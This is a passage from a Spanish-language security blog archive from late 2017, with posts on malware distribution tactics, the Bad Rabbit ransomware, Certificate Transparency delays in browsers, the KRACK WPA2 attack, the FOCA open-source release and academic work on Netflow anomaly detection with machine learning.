diversas técnicas para la distribución del malware. La más utilizada consiste en registrar dominios publicar aplicaciones legítimas con código malicioso inyectado. Sin embargo, en otra de sus campañas, se han identificado una serie de subdominios maliciosos registrados bajo un dominio legítimo perteneciente a un conocido proveedor de servicios de alojamiento compartido en Rusia. En este sentido, para atraer a las víctimas a que descargaran el malware, en ocasiones, realizaba un ataque de phishing por SMS en el que se incluía una URL maliciosa. De esta manera, al hacer click, el dispositivo de la víctima quedaría infectado. Y, por último, otra de las técnicas comunes usadas es el uso de instaladores que aparentemente parecen de otras aplicaciones. Aquí encontrarás más información sobre este threat actor y los indicadores de compromiso asociados al caso. Miguel Ángel de Castro Simón Senior Cybersecurity Analyst at ElevenPaths miguelangel.decastro@telefonica.com Yaiza Rubio Intelligence Analyst at ElevenPaths' Innovation Lab @yrubiosec yaiza.rubiovinuela@telefonica.com
7 de noviembre de 2017
Llega la 4ª edición de la conferencia anual de Data Transparency Lab
Los próximos 11, 12 y 13 de diciembre se celebrará la 4ª Conferencia Anual del Data Transparency Lab, una colaboración inter-institucional entre Telefónica, AT&T, Mozilla, INRIA y MIT Connection Science, para mejorar la transparencia en el uso y gestión de los datos personales. El evento se realizará en el edificio de Telefónica de Barcelona y estará abierto a representantes de la industria, legisladores, investigadores, diseñadores y medios de comunicación que quieran conocer las últimas novedades sobre la transparencia y privacidad de datos para ver lo que esto implica a nivel de negocio y de gestión personal. Este año han participado 45 proyectos de 18 países en este Programa de Becas DTL 2017. 11 de ellos fueron revisados en la reunión del Comité del Programa y 9 de esas 11 propuestas finalistas fueron presentadas durante dicha reunión que tuvo lugar el pasado 23 de junio. Finalmente, el Comité decidió financiar 6 proyectos con becas de 50.000 €. Como cada año, se ha colaborado con universidades y centros de investigación a nivel internacional para otorgar becas a los softwares que mejor le permitan al usuario a ser consciente de cómo usa sus datos y cómo mantiene su privacidad. Estos proyectos serán presentados al público y los softwares deberán estar listos online durante el año tras recibir la beca. El programa de este año incluye también paneles, workshops, demostraciones de aplicaciones, presentaciones del Programa de Becas DTL y el Hack Day. Como novedad, se ha abierto la opción para los inscritos de tener acceso a una aplicación que les permitirá pre-programar reuniones one-to-one con los asistentes y ponentes de las conferencias para sacar el máximo provecho al networking durante el evento. Consulta aquí las sesiones y ponentes confirmados. Programa: Estrategias disruptivas en transparencia: implementando la transparencia. Herramientas para la transparencia móvil Creación de valor de la transparencia de datos para usuarios y empresas Transparencia práctica en la era de la Inteligencia Articifial y Machine Learning Panel: Discriminación y ética de datos Cómo fomentar el desarrollo de la tranparencia Becados 2017 Demo Becados 2016 Poster Session – Becas de viaje ¡No te lo pierdas! Adquiere tus entradas aquí. Para más información puedes visitar la web del Data Transparency Lab, suscribirte a su newsletter de novedades o seguirlos en Twitter.
4 de noviembre de 2017
#CyberSecurityPulse: Última actualización sobre Bad Rabbit
El pasado 24 de octubre las infecciones sobre un ransomware llamado Bad Rabbit comenzaron a extenderse. En menos de un día, había comprometido organizaciones, principalmente en Rusia, Ucrania, Turquía, Bulgaria y los Estados Unidos. El dropper del ransomware fue distribuido mediante un ataque drive-by-download. Es decir, mientras el objetivo visitaba un sitio web legítimo, la víctima se estaría descargando el dropper desde la infraestructura manejada por el threat actor. De esta manera, no se utilizaron exploits, por lo que la víctima tuvieron que ejecutar de forma manual el dropper, que pretendía ser un instalador de Adobe Flash. Sin embargo, Bad Rabbit también utilizaba el exploit EternalRomance como un vector de infección para propagarse dentro de las redes corporativas. El mismo exploit fue utilizado en ExPetr. En este caso, fue un ataque dirigido contra redes corporativas, utilizando métodos similares a los utilizados durante el ataque de ExPetr. El análisis del código ha mostrado una notable similitud entre los binarios de ExPetr y de Bad Rabbit. Según los últimos descubrimientos, al analizar la muestra, parece que los criminales que se encuentran detrás de este malware eran seguidores de la serie de televisión Game of Thrones, ya que algunas de las cadenas utilizadas en el código son nombres de diferentes personajes de esta serie. Pero, por otro lado, también descubrieron que los archivos cifrados por Bad Rabbit se podían recuperar con los siguientes procedimientos específicos: "Hemos descubierto que Bad Rabbit no elimina las instantáneas después de cifrar los archivos de la víctima. Esto significa que si las instantáneas se habilitaron antes de la infección y si el cifrado completo del disco no se produjo por alguna razón, entonces la víctima puede restaurar las versiones originales de los archivos cifrados por medio del mecanismo estándar de Windows o utilidades de terceros". Noticias destacadas El regulador de privacidad holandés afirma que Windows 10 infringe la ley La falta de información sobre cómo utiliza Microsoft los datos que recopila Windows 10 impide que los consumidores den un consentimiento informado al uso de los datos afirma la autoridad holandesa de protección de datos (DPA). Para cumplir con la ley, la DPA establece que Microsoft debe tener más claro qué datos se recopilan y cómo se procesan estos, además de no respetar las configuraciones previas elegidas por el usuario. » Más información en Arstechnica El CSE de Canadá pública herramientas para la lucha contra el malware El organismo dedicado en Canadá a la protección comunicaciones seguras hace publicas herramientas con el objetivo de ayudar a compañías y organizaciones a defender sus equipos y redes. Assemblyline es una herramienta open source para el análisis de malware que, según CSE, se usa para proteger la extensa infraestructura del gobierno canadiense todos los días. » Más información en Bitbucket Noticias del resto de la semana Microsoft publica la herramienta open source Sonar Microsoft anunció la liberación de Sonar, una herramienta de código abierto para el escaneo de sitios web desarrollada por el equipo de Microsoft Edge. Sonar es una herramienta de que analiza el código para una amplia gama de problemas, incluidos los relacionados con errores de codificación, rendimiento, accesibilidad, seguridad, aplicaciones web progresivas (PVA) e interoperabilidad. » Más información en Github Un key-gen de Microsoft Office pudo facilitar el robo de los exploits de la NSA Ha publicado un informe donde explica cómo se podrían haber robado fácilmente el software del PC con Windows de empleados de la NSA. Según los registros de telemetría recopilados por la compañía de origen ruso, un miembro temporal desconectó la protección antivirus del equipo e infectó su equipo personal con un spyware al intentar usar una copia pirateada del software ofimático de Microsoft. APT28 estaría intentando explotar una vulnerabilidad de Flash no parcheada La vulnerabilidad CVE-2017-11292 de Adobe Flash permite explotar un fallo que puede llevar a la ejecución de código en sistemas Windows, Mac, Linux y Chrome OS. Como resultado, los atacantes se están moviendo rápidamente para explotarlo mientras los investigadores de Proofpoint ya han atribuido a APT28 una campaña diseñada para propagar malware utilizando dicha vulnerabilidad. » Más información en Proof of Point Otras noticias Premios de 1000 dólares por encontrar fallos en apps de Google Play » Más información en Hackerone La estrategia de reclutamiento del FBI Centrada en la escuela secundaria » Más información en Cyberscoop El ataque DUHK permite recuperar claves de cifrado utilizadas en VPN y sesiones web » Más información en The Hacker News Sign up for our newsletter! También te puede interesar: #CyberSecurityPulse: La rotura del cifrado de WPA2 que puede poner en jaque nuestra seguridad inalámbrica
31 de octubre de 2017
Certificate Transparency se retrasa hasta abril, y con razón
Chrome lidera la iniciativa, pero ¿está siendo demasiado ambicioso? Hemos hablado en más de una ocasión de que en octubre de 2017 sería el momento en el que Chrome forzaría la adopción de Certificate Transparency en los nuevos certificados emitidos. Pero ni siquiera el propio Chrome ha podido adoptar a tiempo la tecnología que, según la fuerza de impulso que ha tomado, terminará imponiéndose. Pero desde luego no ahora. Veremos en abril y reflexionemos mientras sobre las razones. Mensaje de error (no muy popular aún) para cuando la comprobación del CT falle en Chrome El anuncio se hizo en octubre de 2016, y se dio un año de plazo para que los certificados fueran emitidos con su SCT, o sea, con el añadido de saberse en el "gran escaparate" de Certificate Transparency. Luego Chrome, se entiende, iría degradando poco a poco la visibilidad de los certificados visitados desde su navegador si no disponían de ese SCT. Se acercaba octubre de 2017 y se echaron atrás... o movieron el problema hacia adelante. Errores esporádicos en la validación del SCT en Chrome han causado ya algunos "problemas" a bancos En febrero se realizó una conferencia sobre CT. 55 personas que representaban a los logs, CDN, CAs, académicos, PKIs gubernamentales y navegadores. Prácticamente todo el ecosistema representado en medio centenar de personas. Se supone que de ahí salió reforzada la idea... y así lo intentan describir, con reservas, aunque en positivo ("...han avanzado pero..."). Sin embargo la realidad es que los navegadores, el RFC, y los operadores de logs tienen un peso muy específico, y todo debe funcionar como un reloj sincronizado. Google no puede imponerse por sí mismo y tirar del carro solo. Y parece que nadie ha hecho sus deberes a tiempo. Navegadores Chrome lo hace bien, qué menos. Está perfectamente preparado... aunque no del todo en todos los aspectos. Como presentamos en la Rooted Valencia, si miramos el código todavía vemos situaciones cuando menos... extrañas. Sin ahondar demasiado, la implementación de Chrome, si nos fijamos, tampoco era la mejor hasta el momento (aunque sea en código abierto, no es tan sencillo entender los flujos sin un estudio que requeriría muchísimo más tiempo). Algunas de las fórmulas de Chrome despiertan algunas dudas. Por ejemplo, por un lado parece que la lista de logs de confianza están "incrustados" en el propio código. Por el otro, existe un código como "de prueba" con logs dinámicos a los que está constantemente comprobando su cabecera (su integridad). Pero no se sabe muy bien su función... porque encontramos que realmente, da igual el resultado. De hecho, si la ruta de lo que tiene que comprobar ni siquiera existe o está vacía, el proceso se omite y no comprobación más allá. Parece que está en modo "Log", como si algo de código se hubiera quedado ahí "olvidado" en pruebas. Firefox todavía no ha podido implementar nada. De hecho, hemos realizado en ElevenPaths un plugin antes que la propia Firefox. No hemos abarcado todas las posibilidades que cubre el viaje del SCT, pero es más de lo que han implementado oficialmente. Internet Explorer/Edge ni está ni se le espera en este cuadro. Todavía no ha implementado el HPKP... y quizás incluso sea buena idea, porque está agonizando si no espabila. RFCs El RFC de CT es un draft, pero está en la versión 2 desde principios de junio. Lo curioso es que hay versiones de las API de la versión 2 que no usa literalmente, nadie todavía. Es más, uno de los mayores problemas de CT, que podría ser la revelación de dominios internos, solo fue abordada a través de un RFC que tiene una versión de marzo y otra de julio de este año, por lo que aún necesita bastante rodaje. Existen otros problemas: Se introdujo una cabecera, Expect-CT, simplemente para ayudar a saber si se estaba preparado para este "deadline" de octubre. Así, quien pensara emitir certificados con el SCT, podría al menos tener algo de feedback del navegador (solo Chrome, por supuesto), sobre si hubiera ido todo bien o no, o sea, si el SCT validaba bien en los logs correspondientes. Esa cabecera no se incluyó en Chrome hasta mediados de agosto en su versión 61... Un poco tarde para tratarse de una cabeceras de pruebas hacia una situación que ocurriría en octubre. Por supuesto el resto de navegadores no la han implementado aún. Logs Evolución de la cantidad de certificados en cada uno de los logs conocidos La gestión de logs es un poco caótica. Hay logs congelados, con "tirones" donde durante un tiempo se almacenan muchos certificados, otras veces se congelan... La CA Let’s Encrypt, por sus peculiaridades, sigue una dinámica diferente... Tampoco está muy estructurada la salida de los propios logs o estandarizado quién confía en quién. Ya estudiamos eso en un informe anterior. Pero si miramos la salida (con la versión 1 de las APIs, nadie usa la 2), de algunos, vemos como por ejemplo, ni siquiera el Log del gobierno chino confía en los propios logs de Google. Para el CNIC chino, el certificado CA de Google (autofirmado) no es de confianza... Otra curiosidad, es que Chrome exige unos "uptime" de los logs muy altos como una especie de demostración de compromiso por parte de los que los mantienen. Pero a veces no todos pueden cumplir (en rojo en la imagen). Aun así se les mantiene en el código por ahora. Cert.ch recopila información sobre los logs, cuándo se introdujeron, uptime... Conclusión Con implementaciones que no llegan, o cabeceras que se adoptan con tan poco margen, RFCs que se comienzan este mismo año... ¿Cómo se pretendía hacer obligatorio el uso de SCTs en octubre de 2017? Podría haber sido, pero la realidad ha pesado más. Es necesario más tiempo. En concreto, han pensado que 6 meses más. ¿Será suficiente? Personalmente, no pensamos que Certificate Transparency goce de mala salud (al menos no tan mala como HPKP), solo que Google ha sido excesivamente ambicioso con la propuesta. Poner de acuerdo a tantos actores es complicado, y más aún en entorno tan crítico como el de la seguridad TLS. Sergio de los Santos Innovación y laboratorio ssantos@11paths.com @ssantosv Jose Torres Innovación y laboratorio jose.torres@11paths.com @jose7orres
23 de octubre de 2017
#CyberSecurityPulse: La rotura del cifrado de WPA2 que puede poner en jaque nuestra seguridad inalámbrica
Este lunes 16 de octubre se ha publicado una investigación sobre la rotura del estándar actual de cifrado recomendado para redes WiFi, WPA2. Aunque los riesgos a los que se tienen que enfrentar estas redes no son nuevos y ya han proliferado ataques contra WEP o WPA que hacían de estos protocolos inseguros, el esquema actual estaba considerado robusto. Hasta ahora. El alcance del ataque, propuesto por Mathy Vanhoef y Frank Piessens y conocido como Key Reinstallation Attack (KRACK), explotaría una debilidad que permitiría a un adversario en el rango de la conexión inalámbrica de la red tener acceso a información previamente asumida como segura. A la vista de la información que va llegando con cuentagotas, las consecuencias pueden ser importantes de confirmarse los extremos que se están difundiendo y que implicaría varios CVE cuyo contenido no ha sido publicado aún. Sin embargo, eso no implica que todas nuestras conexiones estén afectadas. En principio, el ataque afecta a las redes WiFi WPA2 y los escenarios principales de ataque asumirían la proximidad física del atacante a las redes y afectarían siempre a la confidencialidad de las comunicaciones dentro de dicha red WiFi que serían potencialmente escuchables si no incluyen alguna otra capa de cifrado adicional como ocurre por ejemplo con HTTPS. Bajo ciertas circunstancias, los investigadores también han sido capaces de no solamente descifrar, sino que también de inyectar paquetes en la red. De todas formas, el problema seguiría siendo serio, porque estaría ampliando el abanico de ataques que tradicionalmente se han podido venir ejecutando sobre redes públicas abiertas a una serie de entornos que hasta ahora asumíamos como confiables. Compartiendo la preocupación de la comunidad mientras se aclaran los detalles, las recomendaciones habituales vuelven al primer plano y no por clásicas deben ser obviadas. Para aquellos que estén verdaderamente preocupados por el impacto potencial que tenga en sus propias redes inalámbricas, siempre se pueden reforzar las medidas de seguridad para redes domésticas considerándolas como redes públicas, por ejemplo forzando las conexiones a través de VPN y, por supuesto, manteniendo actualizados todos los elementos de seguridad habituales para beneficiarse de las actualizaciones de seguridad tan pronto como estas sean publicadas. La preocupación es sana y está de sobra justificada, pero, al mismo tiempo, tenemos la obligación de afrontar una circunstancia que está pasando ahora mismo con la debida serenidad. » Más información en KRACK Attacks Noticias destacadas Outlook ha adjuntado una copia en claro de los mensajes cifrados durante 6 meses Los correos electrónicos enviados desde Microsoft Outlook han estado siendo enviados con una versión no cifrada de los adjuntos junto al texto cifrado. Esta circunstancia expondría el contenido privado de los correos a un atacante con acceso al servidor de correo, comprometiendo precisamente uno de los escenarios contra los que el cifrado pretende luchar: la protección de la confidencialidad de las comunicaciones. La vulnerabilidad identificada como CVE-2017-11776 ha sido calificada como severa y ha afectado al protocolo de cifrado punto a punto S/MIME, uno de los más relevantes a la hora de proteger las comunicaciones por correo electrónico. Bitcoin alcanza un nuevo máximo por encima de los 5000 USD Las criptodivisas vuelven a estar en boca de todos tras el nuevo máximo experimentado por la criptodivisa creada por Satoshi Nakamoto que la semana pasada ya superó con creces la cotización de 5000 USD por primera vez en su historia. La capitalización total del mercado de Bitcoin se acerca cada vez más a la cifra de 100 000 millones de dólares lo que supone también un nuevo récord. Como viene siendo habitual, la cotización de muchas otras criptodivisas también se ha beneficiado de este empuje de Bitcoin haciéndolas crecer hasta cerca de sus máximos históricos en el caso de Ethereum o significativas subidas con respecto a los últimos tiempos como en Litecoin o Ripple. » Más información en Coinmarketcap Noticias del resto de la semana ASD alerta sobre el robo de datos sobre las capacidades militares de Australia La agencia de inteligencia extranjera de Australia, la Dirección de Señales Australianas (ASD), admitió que han sido sustraídos más de 30 GB de documentos militares. Robaron información confidencial sobre las capacidades militares en un contratista del Departamento de Defensa. El portavoz de ASD, Mitchell Clarke, confirmó que los datos no eran «de alto secreto», pero la brecha incluía información confidencial que no era de acceso público. » Más información en Security Affairs Estados Unidos reflexiona sobre la ley de los hacks back La Ley de Certeza Activa de Ciberdefensa modifica la Ley de Fraude y Abuso de Equipos para que las represalias contra ciberdelincuentes sean legales por primera vez en Estados Unidos. El proyecto de ley permitiría a las organizaciones comprometidas investigar fuera de sus redes para identificar a un intruso e incluso llegar a infiltrarse en sus sistemas, destruir los datos que habían sido robados e implementar «beacons» para rastrear la ubicación del atacante. » Más información en United States House of Representatives Disqus confirma su filtración Disqus ha confirmado una filtración que afecta a 17.5 millones de usuarios e incluyó información que data de 2007. «La filtración incluye direcciones de correo, nombres de usuarios de Disqus, fechas de registro y últimas fechas de inicio de sesión en texto plano para 17.5 millones de usuarios». Jason Yan, el CTO de la compañía, escribió además en el blog. Las contraseñas estaban hasheadas con SHA-1 y salt para aproximadamente un tercio de los usuarios. » Más información en Disqus Otras noticias Hackers iraníes comprometen el correo de Theresa May » Más información en Security Affairs La policía ucraniana advierte de nuevos ataques al estilo de NotPetya » Más información en The Hacker News DoubleLocker, el ransomware para Android que cifra ficheros y cambia el PIN » Más información en Security Affairs Sign up for our newsletter!
17 de octubre de 2017
FOCA Open Source
En el último Security Innovation Day 2017 realizado hace unos pocos días, hemos presentado muchas novedades, nuevas patentes, nuevas herramientas y nuevas alianzas… sin embargo, algo un tanto especial para nosotros finalmente vió la luz, La FOCA Open Source . Desde Buenos Aires, y de la mano de José Sperk, miembro del equipo del Laboratorio de ElevenPaths, se realizaron tareas de refactoring para modificar el código de La Foca con el objetivo de poder entregar un código más limpio a la comunidad a la hora de liberarlo. Claramente, la evolución de La Foca original, como comenta nuestro Chairman Chema en su blog, ha hecho que la misma se convierta en una verdadera herramienta de pentesting con muchísimas funcionalidades que hemos tenido que optar por clasificar, tanto para dejarlas dentro del Core, como para pasarlas a modalidad plugin, o directamente eliminarlas por ahora. Siendo así, hemos dejado el Core de La Foca centrado en la búsqueda y análisis de metadatos, junto a los procesos de discovery de equipos y servidores a partir de dicho análisis, y a su vez hemos generado los primeros plugins: Information Gathering, para obtener información extra de los dominios analizados como por ejemplo información de Whois, DNS, etc… Git Finder, para encontrar repositorios GIT instalados en los dominios analizados. SVN Finder, para encontrar repositorios SVN instalados en los dominios analizados. Certificate Transparency Checker, con el fin de chequear los logs en los que están registrados los certificados SCT del dominio analizado. SQLinjector, para detectar (no explotar) posibles vulnerabilidades de sqlinjection en los dominios analizados. Todos estos plugins y los que vayamos subiendo, además de estar dentro del repositorio, están accesibles desde el Market que hemos creado para poder encontrarlos y descargarlos con mayor facilidad. A todo esto, es interesante mencionar que existe un plugin más que lo hemos dejado vinculado al Core, es el plugin de DNS Snooping, y para animaros a crear nuevos plugins hemos subido un código fuente de ejemplo a nuestro repositorio. Aquellos que han sido seguidores de La Foca, sabrán que la herramienta guardaba el proyecto en un archivo .foca pero ahora no vais a ser capaces de encontrarlo, dado que en vez de trabajar con estos archivos de proyectos, se ha decidido trabajar sobre una base de datos (SQL Express) con el fin de: Agilizar el manejo de grandes cantidades de archivos. Mejorar la estabilidad de la herramienta cuando se ejecutan proyectos complejos. Permitir guardar estados de proyecto, intercambiar entre proyectos seleccionándolos de la DB, y recuperar proyectos que no han sido terminados de ejecutar desde su último estado. Permitir compartir información de un proyecto entre analistas, mediante la exportación o importación en formato .json sin tener la obligación de guardar el proyecto. De manera que si un pentester observa algo que le llame la atención, puede pasárselo directamente a otro para que lo continúe como un .json. Otro de los grandes cambios que hemos aprovechado a realizar está relacionado con los buscadores utilizados y la forma de llamarlos. Antes se utilizaba Bing, Google y Exalead que lo reemplazamos por Duck Duck Go, pero además realizábamos la búsqueda por default en el campo search, a no ser que en la configuración se carguen los datos de la API. Ahora es posible cargar tu propia API Key de Shodan a la herramienta y optimizar más aún los resultados obtenidos. Acabamos de dar un gran paso generando La Foca Open Source, ahora esperamos ver cómo la comunidad la hace crecer aún más en su funcionalidad y cómo se generan nuevos plugins para compartir entre todos los pentesters. Claudio Caracciolo Team Leader of the Chief Security Ambassadors and the BS. AS. Research Office at ElevenPaths @holesec claudio.caracciolo@11paths.com También te puede interesar: Rastreando ubicaciones reales en los metadatos de las fotografías con FOCA
11 de octubre de 2017
Netflow, machine learning y la detección de anomalías en red: una aproximación académica (Parte III)
Encontrar patrones en los datos de red que no se ajusten al comportamiento esperado (o sea anomalías), sigue siendo un reto interesante en la seguridad informática. Las anomalías en el tráfico aparecerán por varias razones como actividades maliciosas o caídas, y en este sentido Netflow, en combinación con técnicas de machine learning, puede convertirse en un buen aliado para ir más allá de las firmas y ser capaz así de encontrar patrones previamente desconocidos. Hablábamos en la anterior entrega sobre varias propuestas surgidas para mitigar limitaciones y nos centramos en esta entrega en diferentes aproximaciones académicas que han tenido en cuenta netflow y machine learning como centro del estudio. En un artículo de la universidad de Nevada-Reno 2013 (Li et al.) se puede encontrar ya un repaso de varios de los algoritmos de Machine Learning que se han usado tradicionalmente para el análisis de tráfico de red. Trabajos sobre detección de anomalías con técnicas de machine learning desde 2005 a 2011 Este análisis abarca de 2005 a 2011. Así que vamos a complementar qué se ha hecho desde entonces en la academia. Continuación de trabajos sobre detección de anomalías hasta 2017 Para entender esta clasificación que hemos realizado, es necesario saber que hemos dividido los análisis principalmente en qué características se han centrado, qué perspectiva se ha usado y qué dataset se ha utilizado. Características En la tabla, las características se clasifican como: Basic: contempla campos de Netflow, IP y puerto de origen o destino, protocolo, etc. Derived: longitud de los flujos (fecha de fin – fecha de inicio), tamaño medio de los flujos (bytes/número de paquetes), tasa media de paquetes (número de paquetes/longitud), agregación por IP y carga de bytes, porcentaje de carga de tráfico en un nodo, etc. Application specific heuristic como patrones diarios o semanales, duración de la sesión de un cliente, etc. Advanced: similitud en el intervalo del flujo, entropía, información mutua, etc. Cuanto más rico el conjunto de características, más granularidad para los algoritmos y mejor inteligencia se puede extraer de ellos. En el siguiente gráfico hemos agrupado por número de veces que se ha utilizado cada tipo en los estudios y papers más modernos. Tipos de características usadas en los análisis de los últimos tiempos En el gráfico se puede ver que las características más usadas son las derivadas. Esto sucede sobre todo en los trabajos recopilados anteriores a 2012, mientras que en los trabajos posteriores se tiende más a usar las básicas. Perspectiva La perspectiva se refiere al enfoque que se ha aplicado y para resolver qué tipo de problema se quería resolver al analizar el tráfico Netflow. La perspectiva de anomalías se refiere a la problemática de encontrar patrones que no se corresponden con comportamientos esperables de los usuarios. El reto está en encontrar patrones que previamente no eran conocidos. En los estudios vemos principalmente que desde 2005 a 2011 existía más variedad (monitorización, DoS, gusanos...) pero que desde entonces se han centrado en la detección de anomalías en general. Con respecto a la detección de incidentes de seguridad concretos, se puede hablar por ejemplo de la detección de ataques denial-of-service (DoS) o la detección de botnets. La detección de una botnet puede resultar más difícil que la detección de otro tipo de malware por ello muchas soluciones combinan información a nivel de host y de red para detectarlas. Otro ejemplo es el enfoque destinado a detectar gusanos, que está orientado a estudiar las conexiones y ahí es donde se puede emplear Netflow, analizando el comportamiento del host en función de las conexiones entrantes y salientes, correlando datos Netflow con logs de honeypots o usando gráficos de protocolo. Otra de las perspectivas involucra acciones de monitorización. Estas pueden referirse a varios aspectos: de host (información de cómo el usuario utiliza los recursos de la red y aplicaciones). Se usa para planificación, control de acceso a la red, violaciones de la política de seguridad... Dataset Un buen dataset es la base para un buen estudio basado en el aprendizaje máquina. Se refiere al conjunto de datos recopilado y sobre el que se aplicarán las técnicas correspondientes tras la normalización de datos y extracción de características. De entre los estudios analizados puede verse que en algunos de ellos se ha empleado tráfico de red y en otros tráfico específico de Netflow. En la mayoría se han utilizado desde conjuntos de datos conocidos hasta tráfico real propio recolectado de la red. En relación a los conjuntos de datos públicos, DARPA, KDD y NLS-KDD son ampliamente utilizados. La ventaja de estos conjuntos es que establecen una base común para que la comunidad pueda comparar distintas soluciones y algoritmos. La desventaja es que no contienen tráfico real y suelen quedar desfasados. Por el contrario, el tráfico real puede presentar más problemas a la hora de compartirlo y en general se hace más dificultoso el trabajo de comparar diferentes soluciones. A continuación se exponen las características principales de estos conjuntos de datos. El dataset DARPA fue creado por el MIT en los años 1998 y 1999. Contiene tráfico de red y ha sido uno de los conjuntos más utilizados. Sin embargo, ha sido criticado por algunas razones como la falta de ataques modernos. El dataset KDD 99 dataset contiene tráfico TCP crudo simulado. El tráfico de entrenamiento contiene tráfico recolectado durante 7 semanas, mientras que el de test contiene el de 2 semanas, incluyendo tipos de ataques que no están en el training para hacerlo más realista. Se utilizan 41 características para caracterizar acerca de cada conexión clasificadas como básicas, basadas en contenido y basadas en tiempo. El conjunto está etiquetado, siendo las categorías de ataque éstas: DOS, Probe (ej escaneo de puertos), U2R (acceso no autorizado a privilegios de root), R2L (login no autorizado remoto a una máquina). NSL-KDD es una actualización del conjunto anterior que trata de resolver algunos de sus problemas. Una de sus ventajas es que al no ser excesivamente grande no es necesario seleccionar pequeñas porciones del mismo que vuelven a traer el problema de la imposibilidad de comparar. Otras ventajas son que no incluye muestras redundantes en el conjunto de entrenamiento ni en el de test. Además, el número de muestras para cada nivel de dificultad es inversamente proporcional al del KDD, lo que permite evaluar con más precisión los diferentes algoritmos de Machine Learning. De entre los estudios analizados, 10 usan tráfico real y 7 utilizan tráfico simulado, logs o conjuntos de datos (categoría Non-Netflow). Análisis de resultados ¿Qué algoritmos se han utilizado para el estudio? En las tablas anteriores se puede observar que hasta 2011 el algoritmo más empleado es SVM, habiéndose incorporado posteriormente más variedad en el uso de algoritmos. Ahora es más habitual el empleo de diversas variedades de redes neuronales y clustering, así como de árboles de decisión en menor medida. No es sencillo extraer conclusiones de cuáles son las técnicas que mejor funcionan. Sobre todo si se tiene en cuenta, como se ha comentado anteriormente, que la falta de un conjunto de datos común dificulta la comparación de soluciones. Sin embargo, algunos trabajos sí comparan diferentes algoritmos y a partir de ahí pueden extraerse algunas conclusiones. En el caso de 2014 (Francesco Palmieri, Ugo Fiore and Aniello Castiglione), se ve que el algoritmo J48 proporciona mejores resultados que BayerNet y OneR. Los resultados del estudio 2015 (Félix Iglesias, Tanja Zseby) reflejan que ANN obtiene mejores resultados que DTC, kNN, Bayes, SVM en el caso en el que se seleccionan 16 características de las 41 que componen los conjuntos NSL-KDD o KDD. Aunque no se cuenta con un conjunto de datos común, analizando los resultados de los trabajos de la tabla II se observa que algunos que resultan de mayor interés. A continuación amplía la información de la tabla II sobre estos trabajos en relación a cómo realizan la tarea de detección y el pre/post-procesamiento. El trabajo 2014 (Francesco Palmieri, Ugo Fiore and Aniello Castiglione) utiliza Blind source separation para modelar Independent component analysis como primer paso. Luego utiliza árboles de decisión para la etapa de clasificación. En 2015 (Shin-Ying Huang et al.) se realiza una etapa de preprocesamiento aplicando clustering y extracción de datos. A continuación se utiliza como algoritmo incremental majority, que es una variación de redes neuronales, realizando varias iteraciones al utilizar una ventana deslizante. Posteriormente se refinan los límites que definen el intervalo de normalidad aplicando un algoritmo que llaman de detección de anomalías, escogiendo aquellos límites que optimizan la tasa de aciertos y minimizan los errores. 2012 (Ugo Fiore et al.) utiliza máquinas de Boltzmann (un tipo de red neuronal recurrente estocástica) para detectar los eventos anómalos en la red. En la etapa de preprocesamiento usa Bro junto con una herramienta para parsear las trazas. Llama la atención que dos de estos trabajos que mejores resultados obtienen utilizan variaciones de redes neuronales para la clasificación. Es destacable la capacidad de adaptación de estos algoritmos ante muestras no vistas previamente si se considera que el tráfico de red, además de ser complejo e impredecible, está sujeto a cambios puesto que las anomalías continúan evolucionando. Para ello los algoritmos de ML pueden ayudar a caracterizar el tráfico normal y detectar aquellos comportamientos que se desvían de lo esperado. A continuación, ofrecemos una lista de referencia de los trabajos citados. Más información: 2005 (Lakhina et al.) Lakhina A, Papagiannaki K, Crovella M, Diot C, Kolaczyk ED, Taft N. Structural analysis of network traffic flows. SIGMETRICS Performance Evaluation Review 2004;32(June (1)):61–72. 2007 (Liu et al.) Liu X-W, Wang H-Q, Liang Y, Lai J-B. Heterogeneous multi-sensor data fusion with multi-class support vector machines: creating network security situation awareness. In: 2007 international conference on machine learning and cybernetics, vol. 5, 2007. p. 2689–94. 2008 (Wang and Gou) Wang S, Guo R. GA-based filtering algorithm to defend against DDoS attack in high speed network. In: Fourth international conference on natural computation, 2008. ICNC ’08. vol. 1, 2008. p. 601–7. 2010 (Wagner et al.) Wagner C, Wagener G, State R, Engel T, Dulaunoy A. Game theory driven monitoring of spatial-aggregated IP-Flow records. In: 2010 International conference on network and service management (CNSM), 2010. p. 463–8. 2010 (Strasburg et al.) Strasburg C, Krishnan S, Dorman K, Basu S, Wong JS. Masquerade detection in network environments. In: 10th IEEE/IPSJ international symposium on applications and the Internet (SAINT), 2010, July 2010. p. 38–44. 2011 (Abdulla et al.) Abdulla SA, Ramadass S, Altaher A, Nassiri AA. Setting a worm attack warning by using machine learning to classify netflow data. International Journal of Computer Applications 2011;36(December (2)):49–56. 2011 (Wagner et al.) Wagner C, Franc -ois J, State R, Engel T. Machine learning approach for IP-flow record anomaly detection. In: Proceedings of the 10th international IFIP TC 6 conference on Networking—volume part I, NETWORKING’11. Berlin, Heidelberg: Springer-Verlag; 2011. p. 28–39. 2011 (Wagner et al.) Wagner C, Francois J, State R, Engel T. DANAK: finding the odd! In: 5th International conference on network and system security (NSS), 2011, 2011. p. 161–8. 2011 (Winter et al.) Winter P, Hermann E, Zeilinger M. Inductive intrusion detection in flow-based network data using one-class support vector machines. In: 4th IFIP international conference on new technologies, mobility and security (NTMS), 2011, 2011. p. 1–5. 2013 (Li et al.) Bingdong Li, Jeff Springer, George Bebis, and Mehmet Hadi Gunes. 2013. Review: A survey of network flow applications. J. Netw. Comput. Appl. 36, 2 (March 2013), 567-581. DOI=http://dx.doi.org/10.1016/j.jnca.2012.12.020 2014 (Francesco Palmieri, Ugo Fiore and Aniello Castiglione) Francesco Palmieri, Ugo Fiore, and Aniello Castiglione. 2014. A distributed approach to network anomaly detection based on independent component analysis. Concurr. Comput. : Pract. Exper. 26, 5 (April 2014), 1113-1129. DOI=http://dx.doi.org/10.1002/cpe.3061 2015 (Félix Iglesias, Tanja Zseby) F. Iglesias Vazquez, T. Zseby: Analysis of network traffic features for anomaly detection. Machine Learning, 101 (2015), 1; 59 - 84. 2014 (Wei Xiong et al.) Hu, H., Peng, W., Qu, Y., Wang, X., Xiong, W., Xiong, N., & Yang, L.T. (2014). Anomaly secure detection methods by analyzing dynamic characteristics of the network traffic in cloud communications. Inf. Sci., 258, 403-415. 2014 (K. Giotis et al.) K. Giotis, C. Argyropoulos, G. Androulidakis, D. Kalogeras, V. Maglaris, Combining OpenFlow and sFlow for an effective and scalable anomaly detection and mitigation mechanism on SDN environments, Computer Networks, Volume 62, 7 April 2014, Pages 122-136, ISSN 1389-1286, 